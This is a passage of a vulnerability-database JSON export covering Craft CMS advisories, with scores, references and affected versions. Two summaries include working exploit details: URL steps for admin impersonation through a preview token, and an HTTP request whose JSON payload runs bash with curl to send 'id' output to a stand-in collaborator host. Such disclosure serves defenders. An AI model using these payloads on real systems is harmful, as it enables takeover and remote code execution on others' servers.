ubw"},{"vulnerability":"VCID-kbrc-85av-nfcn"},{"vulnerability":"VCID-m5rf-usae-yfb7"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-pgm4-svq8-tfc5"},{"vulnerability":"VCID-ppet-ruae-1kav"},{"vulnerability":"VCID-qq68-3j4y-47am"},{"vulnerability":"VCID-qywv-vf4r-8bh9"},{"vulnerability":"VCID-r5hp-5nju-9ubz"},{"vulnerability":"VCID-rb7c-3nkc-gkeg"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-twuy-wzb7-k7g3"},{"vulnerability":"VCID-tzjk-x116-ayge"},{"vulnerability":"VCID-vasz-rnn1-67ev"},{"vulnerability":"VCID-vvhc-rnpr-ubey"},{"vulnerability":"VCID-w9yn-1573-hyau"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.4.3"}],"aliases":["CVE-2024-52293","GHSA-f3cw-hg6r-chfv"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-71sv-62m4-z3er"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/49581?format=json","vulnerability_id":"VCID-7y4f-ef7t-47eb","summary":"Craft CMS vulnerable to potential authenticated Remote Code Execution via malicious attached Behavior\nThis was reported as a vulnerability in Yii framework on August 7th (https://github.com/yiisoft/yii2/security/advisories/GHSA-gcmh-9pjj-7fp4). The Yii framework team denies responsibility for this (placing the onus on application developers) and hence has not (and seemingly will not) provide a fix at the framework level. Hence, I am reporting this to Craft as I found it to affect the latest (`5.6.0`) version of Craft CMS.\n\nLeveraging a legitimate but maliciously crafted Yii `Behavior` class, it’s possible to trigger Remote Code Execution (RCE) via Reflection when the tainted `Behavior` is attached to a Yii `Component`, and an event is also fired on the tainted `Component`.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-68455","reference_id":"","reference_type":"","scores":[{"value":"0.0114","scoring_system":"epss","scoring_elements":"0.78777","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-68455"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/blob/5.x/CHANGELOG.md#5821---2025-12-04","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-01-06T14:26:28Z/"}],"url":"https://github.com/craftcms/cms/blob/5.x/CHANGELOG.md#5821---2025-12-04"},{"reference_url":"https://github.com/craftcms/cms/commit/27f55886098b56c00ddc53b69239c9c9192252c7","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-01-06T14:26:28Z/"}],"url":"https://github.com/craftcms/cms/commit/27f55886098b56c00ddc53b69239c9c9192252c7"},{"reference_url":"https://github.com/craftcms/cms/commit/6e608a1a5bfb36943f94f584b7548ca542a86fef","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-01-06T14:26:28Z/"}],"url":"https://github.com/craftcms/cms/commit/6e608a1a5bfb36943f94f584b7548ca542a86fef"},{"reference_url":"https://github.com/craftcms/cms/commit/ec43c497edde0b2bf2e39a119cded2e55f9fe593","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-01-06T14:26:28Z/"}],"url":"https://github.com/craftcms/cms/commit/ec43c497edde0b2bf2e39a119cded2e55f9fe593"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-68455","reference_id":"CVE-2025-68455","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-68455"},{"reference_url":"https://github.com/advisories/GHSA-255j-qw47-wjh5","reference_id":"GHSA-255j-qw47-wjh5","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-255j-qw47-wjh5"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-255j-qw47-wjh5","reference_id":"GHSA-255j-qw47-wjh5","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-01-06T14:26:28Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-255j-qw47-wjh5"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/73169?format=json","purl":"pkg:composer/craftcms/cms@5.8.21","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-39ct-cg7w-kyb6"},{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-5q5g-jrxm-eyhe"},{"vulnerability":"VCID-5tzm-738x-xka9"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-8u2j-17a4-q7eh"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-9enr-b6zd-mbh8"},{"vulnerability":"VCID-a3b5-pwyh-yugv"},{"vulnerability":"VCID-a8p2-5cmc-n7g2"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-azr5-12f8-hfbm"},{"vulnerability":"VCID-bqep-3c6u-mqhu"},{"vulnerability":"VCID-cys8-jnmu-77ec"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-esma-wxje-eqh3"},{"vulnerability":"VCID-fpea-e48p-kfbn"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-hkp9-3hzv-quhk"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-jeyh-3jxd-z3g6"},{"vulnerability":"VCID-jnrx-e9b5-wqew"},{"vulnerability":"VCID-jxz8-g6fq-dubw"},{"vulnerability":"VCID-kbrc-85av-nfcn"},{"vulnerability":"VCID-m5rf-usae-yfb7"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-p3n8-1sht-bfbt"},{"vulnerability":"VCID-pgm4-svq8-tfc5"},{"vulnerability":"VCID-ppet-ruae-1kav"},{"vulnerability":"VCID-qwmy-d2e8-5khw"},{"vulnerability":"VCID-qywv-vf4r-8bh9"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-twuy-wzb7-k7g3"},{"vulnerability":"VCID-tzjk-x116-ayge"},{"vulnerability":"VCID-vasz-rnn1-67ev"},{"vulnerability":"VCID-vvhc-rnpr-ubey"},{"vulnerability":"VCID-w9yn-1573-hyau"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.8.21"}],"aliases":["CVE-2025-68455","GHSA-255j-qw47-wjh5"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-7y4f-ef7t-47eb"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90802?format=json","vulnerability_id":"VCID-83rt-3tyj-qbgx","summary":"Craft CMS Vulnerable to Privilege Escalation/Bypass through UsersController->actionImpersonateWithToken()\n### Summary\nA low-privilege user (or an unauthenticated user who has been sent a shared URL) can escalate their privileges to admin by abusing `UsersController->actionImpersonateWithToken`.\n\nAffected users should update to Craft 4.17.6 and 5.9.12 to mitigate the issue.\n\n### Details\nThis vulnerability allows any low-privilege user to escalate their privileges and become an admin, or, in extreme circumstances, unprivileged users to do the same.\n\nTherefore, this vulnerability affects Craft Pro and Team more than Craft Solo.\n\nSpecifically, an attacker who possesses a valid “preview token” can then append `&action=users/impersonate-with-token&userId=1&prevUserId=1` to the preview URL to hijack the request into the impersonation endpoint, logging in as any user (including admin) without authentication. Getting the preview token is easy, and all an editor would have to do is create a single article, click “Preview”, and then recover this token.\n\nHere’s what happens:\n\n1. The action re-dispatch in `actionPreview()` passes `$skipSpecialHandling=true` to `handleRequest()`, bypassing all security guards, and passes `$checkToken=false` to `checkIfActionRequest()`, which allows an attacker-controlled action query parameter to override the dispatch target.\n2. The `requireToken()` guard on `actionImpersonateWithToken()` only checks a boolean (`_hadToken`) that was set when the preview token was initially resolved. It does not verify that the token was intended for the impersonation action, and so any valid token from any route satisfies the check.\n3. `actionImpersonateWithToken` is listed in `$allowAnonymous` and performs no authorization beyond `requireToken()`, so no prior authentication is required.\n\n### PoC\n\nThe PoC achieves full admin takeover on the latest Craft CMS 5.9.10. Spawn a local version of Craft. Then, you’ll want to log in and create a valid setup:\n\n1. Log in at http://host:18895/admin\n2. Go to Settings,  Sections, New Section (name: \"Blog\", type: \"Channel\")\n3. Under Site Settings, set URI Format to blog/{slug}\n4. Then go to Entries, New Entry, Blog, and give it any title\n\nNext, obtain a preview token\n\n1. Open the saved entry in the editor\n2. Click the Preview button\n3. A preview pane opens with the entry rendered in an iframe\n4. Right-click inside the preview pane and Inspect Element\n5. Find the <iframe> element; its src contains the tokenized URL: `http://host:18895/blog/title?x-craft-live-preview=...&token=XXXXXXXX`\n6. Copy the `token=` value\n\nFinally, execute the exploit:\n\n  1. Open a new incognito/private browser window\n  2. Navigate to: `http://host:18895/?token=XXXXXXXX&action=users/impersonate-with-token&userId=1&prevUserId=1`\n  3. You may see a 404.  This is expected.\n\nTo verify the exploit, in the same incognito tab, navigate to `http://host:18895/admin`. You should land on the admin dashboard, logged in as admin, without ever entering credentials.\n\n### Impact\n\nPrivilege escalation; everyone is impacted.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-32267","reference_id":"","reference_type":"","scores":[{"value":"0.00046","scoring_system":"epss","scoring_elements":"0.14681","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-32267"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/commit/6301e217c5f15617d939c432cb770db50af14b33","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-18T15:43:19Z/"}],"url":"https://github.com/craftcms/cms/commit/6301e217c5f15617d939c432cb770db50af14b33"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-cc7p-2j3x-x7xf","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-18T15:43:19Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-cc7p-2j3x-x7xf"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32267","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32267"},{"reference_url":"https://github.com/advisories/GHSA-cc7p-2j3x-x7xf","reference_id":"GHSA-cc7p-2j3x-x7xf","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-cc7p-2j3x-x7xf"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/112606?format=json","purl":"pkg:composer/craftcms/cms@5.9.12","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-a8p2-5cmc-n7g2"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-bqep-3c6u-mqhu"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-jnrx-e9b5-wqew"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-tzjk-x116-ayge"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.9.12"}],"aliases":["CVE-2026-32267","GHSA-cc7p-2j3x-x7xf"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-83rt-3tyj-qbgx"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50542?format=json","vulnerability_id":"VCID-8u2j-17a4-q7eh","summary":"Craft CMS Vulnerable to Authenticated RCE via \"craft.app.fs.write()\" in Twig Templates\nAn authenticated administrator can achieve Remote Code Execution (RCE) by injecting a Server-Side Template Injection (SSTI) payload into Twig template fields (e.g., Email Templates). By calling the `craft.app.fs.write()` method, an attacker can write a malicious PHP script to a web-accessible directory and subsequently access it via the browser to execute arbitrary system commands.\n\n---","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-28697","reference_id":"","reference_type":"","scores":[{"value":"0.00208","scoring_system":"epss","scoring_elements":"0.43271","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-28697"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"9.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/commit/9dc2a4a3ec8e9cd5e8c0d1129f36371437519197","reference_id":"","reference_type":"","scores":[{"value":"9.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-04T18:02:12Z/"}],"url":"https://github.com/craftcms/cms/commit/9dc2a4a3ec8e9cd5e8c0d1129f36371437519197"},{"reference_url":"https://github.com/craftcms/cms/pull/18216","reference_id":"","reference_type":"","scores":[{"value":"9.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-04T18:02:12Z/"}],"url":"https://github.com/craftcms/cms/pull/18216"},{"reference_url":"https://github.com/craftcms/cms/pull/18219","reference_id":"","reference_type":"","scores":[{"value":"9.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-04T18:02:12Z/"}],"url":"https://github.com/craftcms/cms/pull/18219"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-28697","reference_id":"CVE-2026-28697","reference_type":"","scores":[{"value":"9.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-28697"},{"reference_url":"https://github.com/advisories/GHSA-v47q-jxvr-p68x","reference_id":"GHSA-v47q-jxvr-p68x","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-v47q-jxvr-p68x"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-v47q-jxvr-p68x","reference_id":"GHSA-v47q-jxvr-p68x","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"9.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-04T18:02:12Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-v47q-jxvr-p68x"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/73952?format=json","purl":"pkg:composer/craftcms/cms@5.9.0-beta.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-5tzm-738x-xka9"},{"vulnerability":"VCID-6ban-jvfq-w3at"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-a8p2-5cmc-n7g2"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-bqep-3c6u-mqhu"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-jnrx-e9b5-wqew"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-p3n8-1sht-bfbt"},{"vulnerability":"VCID-pgm4-svq8-tfc5"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-tzjk-x116-ayge"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.9.0-beta.1"}],"aliases":["CVE-2026-28697","GHSA-v47q-jxvr-p68x"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-8u2j-17a4-q7eh"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/95139?format=json","vulnerability_id":"VCID-9ca4-tbhq-27ad","summary":"Craft CMS has Potential Authenticated Remote Code Execution via Malicious Attached Behavior\nWe identified a vulnerability in the latest version of Craft CMS which contains an input-handling flaw in a Yii object creation path that let any authenticated user inject malicious configuration and execute arbitrary commands on the server.  Yii’s dynamic object configuration, as implemented in Craft CMS, is a feature that lets the application build parts of itself from a settings list.\n\nThis is largely a continuation of https://github.com/craftcms/cms/security/advisories/GHSA-255j-qw47-wjh5, but through a different path that was not mitigated in the original.\n\nThe request-controlled condition field layouts data is converted into a live FieldLayout object without a `Component::cleanseConfig()` boundary. Because Craft configures models before `parent::__construct()`, attacker-controlled special config keys can take effect during object creation, and FieldLayout initialization then triggers a same-request event.\n\nThis appears to be another variant of the recent object-config / behavior-injection bug family, but via the condition / field layout hydration path.\n\nWe were able to reproduce the attack by issuing a POST request to `/admin/actions/element-search/search` with the following JSON from any connected user. Other routes can be exploited in the same way, including the rest of the element-indexes actions that pass through that same `beforeAction()` path. This results in a curl request to the chosen server with the result of the command “id” for the web user being appended to the path:\n\n ```\nPOST /admin/actions/element-search/search HTTP/2\nHost: hostnamehere\nCookie: CraftSessionId=...; 1234123412341234_identity=...; CRAFT_CSRF_TOKEN=...;\nContent-Length: …\nUser-Agent: Mozilla/5.0\nX-Csrf-Token: ...\nAccept: application/json\nContent-Type: application/json\n\n{\n\n  \"elementType\": \"craft\\\\elements\\\\Category\",\n  \"siteId\": 1,\n  \"search\": \"\",\n  \"condition\": {\n    \"class\": \"craft\\\\elements\\\\conditions\\\\ElementCondition\",\n    \"elementType\": \"craft\\\\elements\\\\Category\",\n    \"fieldLayouts\": [\n      {\n        \"as rce\": {\n          \"__class\": \"yii\\\\behaviors\\\\AttributeTypecastBehavior\",\n          \"__construct()\": [\n            {\n              \"attributeTypes\": {\n                \"typecastBeforeSave\": [\n                  \"Psy\\\\Readline\\\\Hoa\\\\ConsoleProcessus\",\n                  \"execute\"\n                ]\n              },\n              \"typecastBeforeSave\": \"/bin/bash -c \\\"curl [https://yourcollaboratorservergoeshere/`id`\\](https://yourcollaboratorservergoeshere/%60id%60/)\"\"\n            }\n          ]\n        },\n        \"on *\": \"self::beforeSave\"\n      }\n    ]\n  }\n}\n```\n\n## Resources\n\nhttps://github.com/craftcms/cms/commit/ab85ca7f5f926994f723f60584054a1f4c4c5de3","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-44011","reference_id":"","reference_type":"","scores":[{"value":"0.00022","scoring_system":"epss","scoring_elements":"0.06383","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-44011"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/commit/ab85ca7f5f926994f723f60584054a1f4c4c5de3","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-05-13T15:01:05Z/"}],"url":"https://github.com/craftcms/cms/commit/ab85ca7f5f926994f723f60584054a1f4c4c5de3"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-qrgm-p9w5-rrfw","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-05-13T15:01:05Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-qrgm-p9w5-rrfw"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-44011","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-44011"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-255j-qw47-wjh5","reference_id":"GHSA-255j-qw47-wjh5","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-255j-qw47-wjh5"},{"reference_url":"https://github.com/advisories/GHSA-qrgm-p9w5-rrfw","reference_id":"GHSA-qrgm-p9w5-rrfw","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-qrgm-p9w5-rrfw"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/118776?format=json","purl":"pkg:composer/craftcms/cms@5.9.18","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.9.18"}],"aliases":["CVE-2026-44011","GHSA-qrgm-p9w5-rrfw"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-9ca4-tbhq-27ad"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50068?format=json","vulnerability_id":"VCID-9enr-b6zd-mbh8","summary":"Craft CMS Vulnerable to potential authenticated Remote Code Execution via malicious attached Behavior\nA Remote Code Execution (RCE) vulnerability exists in Craft CMS where the `assembleLayoutFromPost()` function in `src/services/Fields.php` fails to sanitize user-supplied configuration data before passing it to `Craft::createObject()`. This allows authenticated administrators to inject malicious Yii2 behavior configurations that execute arbitrary system commands on the server. This vulnerability represents an **unpatched variant** of the behavior injection vulnerability addressed in GHSA-255j-qw47-wjh5, affecting different endpoints through a separate code path.\n\n---","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-25498","reference_id":"","reference_type":"","scores":[{"value":"0.00315","scoring_system":"epss","scoring_elements":"0.54952","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-25498"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/commit/395c64f0b80b507be1c862a2ec942eaacb353748","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_el